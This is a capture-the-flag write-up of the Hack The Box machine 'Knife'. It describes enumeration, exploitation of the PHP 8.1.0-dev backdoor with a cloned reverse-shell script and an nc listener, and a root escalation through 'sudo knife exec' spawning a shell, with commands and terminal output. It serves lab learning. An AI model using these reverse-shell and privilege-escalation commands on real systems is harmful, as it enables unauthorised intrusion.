---
layout: post
title: "HTB - Knife"
author: "joelczk"
tags: HTB
excerpt_separator: <!--more-->
---
I've just completed Knife from HTB! In my opinion, Knife is a rather straight forward box that makes use of existing backdoors. Here's a quick writeup on how I went about solving this box

<!--more-->

## HTB - Knife
**Box** : Knife\
**IP Address** : 10.10.10.242\
**Operating System** : Linux

**Reflections**:
- Google is your best friend!
- Also not to forget, `exploitdb` :)

### Enumeration
As usual, we will first start off with our normal Nmap scans to identify the possible open ports and the operating systems behind each port. This box is quite simple, with only 2 open ports - `22` and `80`.

Port `22` belongs to an SSH server, while port `80` belongs to a web server running on `Apache 2.4.41 (Ubuntu)`

Visiting the web server does not yield any interesting results providing hints to any exploitable vulnerabilities. So, we will go on to scan the website with `Nikto`, which uncovered an interested information that the web server has an `x-powered-by` header of `PHP/8.1.0-dev`

```bash
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
```

### Exploitation

The first step that I took was to try to exploit the `Apache/2.4.41` by searching for vulnerabilities related to it. CVE 2020-1927 was found to be the most promising exploit related to it, but unfortunately I was unable exploit it on the website (LIFE OF A SAD HTB PLAYER IN A NUTSHELL....)

The second step that I tried was to look for potential exploits for `PHP/8.1.0-dev`. This time though, I was able to find potential exploits on this [repository](https://github.com/flast101/php-8.1.0-dev-backdoor-rce). This repository provided 2 different exploits, namely a `reverse shell exploit` and a `RCE exploit`. For this case, I choose to do a `reverse shell exploit` first but thankfully it worked!! (Actually I was just lazy and just took a random exploit to try it out XD)

```bash
git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
mv revshell_php_8.1.0-dev.py exploit_revshell.py 
```

Now, all that is left is for us to first open a listener on the attacker's machine using `nc -nlvp 3000` and execute the exploit script on the victim's machine using `python3 exploit_revshell.py http://10.10.10.242 <Your IP address> 3000 `

Now, we have successfully obtained a reverse shell! So what's next? Of course, we have to stabilize the shell :-)

```bash
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 3000
listening on [any] 3000 ...
connect to [10.10.16.250] from (UNKNOWN) [10.10.10.242] 48826
bash: cannot set terminal process group (1036): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
james@knife:/$ cd home
cd home
```

### Obtaining user flag

Now, all that is left for us is to obtain the user flag! Easy Peezy

```bash
james@knife:/home$ ls
ls
james
james@knife:/home$ cd james
cd james
james@knife:~$ ls
ls
user.txt
james@knife:~$ cat user.txt
cat user.txt
```

### Obtaining system/root flag

Wait! But we are not done with the machine yet! There is still another system flag yet to be discovered.

So, let's run `sudo -l` to check for the permissions. What we noticed was that `/usr/bin/knife` can be executed with root privileges, without the need for any password :o

```bash
james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
```

But, here comes the problem - What exactly is this `/usr/bin/knife`? So, a very quick google search tells me that `/usr/bin/knife` belongs to an open-source [repository](https://github.com/chef/chef) which serves as an infrastructure server.

So now comes the next question - How can `/usr/bin/knife` be exploited? Fortunately, the answer lies in the documentation of `knife`. Reading the documentation, I discovered that there is a `knife exec` command that allows me to execute scripts using `knife`. This could potentially allow us to obtain a root shell.

Now, lets put our theory to the test! And, it worked! All we have to do is to stabilize the shell and obtain the system flag.

```bash
james@knife:~$ sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"
sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"
# python3 -c 'import pty; pty.spawn("/bin/bash")'   
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@knife:/home/james# cd /root
cd /root
root@knife:~# ls
ls
delete.sh  root.txt  snap
root@knife:~# cat root.txt
cat root.txt
```